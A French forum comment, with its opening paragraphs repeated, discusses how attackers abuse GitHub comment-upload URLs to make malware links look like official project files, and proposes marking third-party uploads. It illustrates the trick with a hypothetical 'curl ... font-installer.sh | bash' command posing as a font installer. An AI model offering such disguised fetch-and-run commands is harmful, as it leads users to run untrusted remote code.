Je suis d'accord et pas d'accord avec toi que le terme est tangent. Ce n'est pas une faille technique, mais ça exploite une faille humaine. Quand on voit comment ça se passe avec le phishing par mail, c'est plutôt astucieux. On nous habitue à vérifier les URLs dans les mails, etc... Et là ça fait des URLs toutes jolies.
Il n'y a pas de mécanisme permettant de différencier qu'un fichier a été déposé par un membre du projet vs une personne random. Une petite icône à côté des fichiers posés par un tiers peut mitiger le problème, par exemple, ou un schéma un peu différent.
Exemple :
Pour installer la police de caractères ScreamingTurtle utilisée par YoupiScanner, faites simplement :
[^] # Re: faille?
Posté par cg . En réponse au lien Des hackers profitent d'une faille technique de GitHub pour diffuser leur malware. Évalué à 7.
Je suis d'accord et pas d'accord avec toi que le terme est tangent. Ce n'est pas une faille technique, mais ça exploite une faille humaine. Quand on voit comment ça se passe avec le phishing par mail, c'est plutôt astucieux. On nous habitue à vérifier les URLs dans les mails, etc... Et là ça fait des URLs toutes jolies.
Il n'y a pas de mécanisme permettant de différencier qu'un fichier a été déposé par un membre du projet vs une personne random. Une petite icône à côté des fichiers posés par un tiers peut mitiger le problème, par exemple, ou un schéma un peu différent.
Exemple :
Pour installer la police de caractères ScreamingTurtle utilisée par YoupiScanner, faites simplement :
curl https://example.com/microsoft/msfonts/files/abc123def456/screamingturtle-font-installer.sh | bash1Si l'URL était comme ceci :
curl https://example.com/microsoft/msfonts/comments-uploads/files/abc123def456/screamingturtle-font-installer.sh | bashpeut-être que dans 2% des cas on ne download pas le fichier.
rien de tel qu'un
curl | bashpour mettre tout le monde d'accord :D ↩